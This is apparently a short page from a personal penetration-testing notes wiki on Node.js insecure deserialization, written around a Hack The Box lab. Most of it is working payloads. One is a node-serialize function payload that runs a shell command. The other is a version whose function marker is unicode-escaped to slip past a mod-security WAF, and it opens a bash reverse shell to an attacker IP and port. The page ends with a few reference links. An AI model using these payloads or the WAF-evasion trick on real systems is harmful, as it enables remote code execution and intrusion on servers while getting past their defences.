Node.js Deserialization

{"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}"}

Mod-security bypass

In HTB sekhmet lab i blocked by mod-security.

how to bypass : [change the payload to hexadecimal]

{"rce":"_$$ND_FUNC$$                //this func triggers the WAF

{"rce":"_$$\u004e\u0044_FUNC$$_\u0066unction(){ require('child_process').exec(\"bash -c 'bash -i >& /dev/tcp/10.10.14.54/9001 0>&1'\", function(error, stdout, stderr) { console.log(stdout) })}()"}

Basic explaination

Serialization and deserialization in Node.jsHoneybadger

Insecure DeserializationMedium

PreviousDeserialization NextSHODAN DORK

Last updated 4 months ago